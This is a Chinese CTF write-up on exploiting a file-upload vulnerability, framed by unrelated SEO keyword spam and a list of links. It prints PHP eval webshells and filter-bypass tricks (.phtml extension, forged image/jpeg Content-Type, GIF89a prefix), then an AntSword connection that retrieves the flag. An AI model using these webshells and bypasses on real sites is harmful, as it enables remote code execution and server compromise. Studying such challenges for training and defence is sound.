当前位置: 首页 > news >正文

网站建设公司发展前景做网站前台用什么软件

网站建设公司发展前景,做网站前台用什么软件,专做会议发布的网站,软文推广平台有哪些题目环境&#xff1a; 根据题目和环境可知此题目是一道文件上传漏洞 编写一句话木马脚本<?php eval($_POST[shell]);?>将脚本文件更改为jpg图片文件我这里是flag.jpg上传文件并burpsuite抓包Repeater重放 报错一句话木马里面有<?字符 换一种一句话木马继续编写木马…

题目环境:
image.png

根据题目和环境可知此题目是一道文件上传漏洞

编写一句话木马脚本
<?php @eval($_POST['shell']);?>
将脚本文件更改为jpg图片文件
我这里是flag.jpg
image.png
image.png
image.png
上传文件并burpsuite抓包
image.png
Repeater重放
image.png
image.png

报错一句话木马里面有<?字符

换一种一句话木马
继续编写木马脚本
<script language="php">@eval($_POST['shell']);</script>
image.png
保存为flag.phtml文件

绕过后缀的有文件格式有php,php3,php4,php5,phtml.pht
因为前几个都被过滤了,所以选择使用phtml后缀

上传抓包
image.png
修改为image/jpeg图片格式
Repeater重放Send
image.png
不是图片
通过GIF89a进行绕过
GIF89a<script language="php">@eval($_POST['shell']);</script>

使文件为动态GIF文件绕过检测

image.png
访问upload/flag.phtml文件
image.png
上传成功
复制URL链接
使用中国蚁剑连接
image.png
在/根目录下找到flag文件
访问flag文件
image.png
image.png
得到flag:
flag{5359382e-ae88-42a8-8116-8c85a02fb21f}

http://www.yayakq.cn/news/77505/

相关文章:

  • 门网站制作如何开一家网络推广公司
  • 福田官网上海企业网站优化公司
  • 千鸟云网站建设百度sem运营
  • wordpress防站教程电商运营需要掌握哪些知识
  • 罗湖区住房和建设网站本地wordpress后台进不去
  • 做论坛网站数据库需多大网站推广工作
  • 北京建网站软件虚拟机安装 wordpress
  • 国外英文网站现在开网站做微商赚钱吗
  • 网站开发综合课程设计北京百度推广排名优化
  • 网站带gov后缀本科自考报名的时间
  • 包做包装的网站合肥集团网站建设
  • 湖北神润建设工程网站阿里巴巴官网首页1688
  • 免费网站定制百度网页版微信
  • 中国建设监理网站怎样制作app文件
  • 足球比方类网站开发wordpress中文cms主题
  • 网站开发招聘简历模板湘乡新闻头条
  • 广州制作网站公司哪家好企业网站维护费用
  • 哪里有网站建设官网建设网站之前都需要准备什么问题
  • 医院网站建设方案需要多少钱如何做网络营销能成功呢
  • 保定医疗网站建设公司成都网站建设上市
  • 尚品中国多年专注于高端网站建设青岛网站定制多少钱
  • 陕西专业网站建设公司网站的切换语言都是怎么做的
  • 云南网站建设维修公司哪家好wordpress评论自动刷新
  • 建设银行网站登录密码常见的电子商务网站有哪些
  • 浙江中联建设集团网站如何查看网站是否被黑
  • 德阳住房和城乡建设局网站专业网站开发多少钱
  • 网站建设规划书范文技术服务外包公司
  • 可信网站认证服务中心网站开发模式有什么
  • 安徽有几家做网站医疗网站怎么做优化
  • 空间服务 网站被黑杭州免费网站建设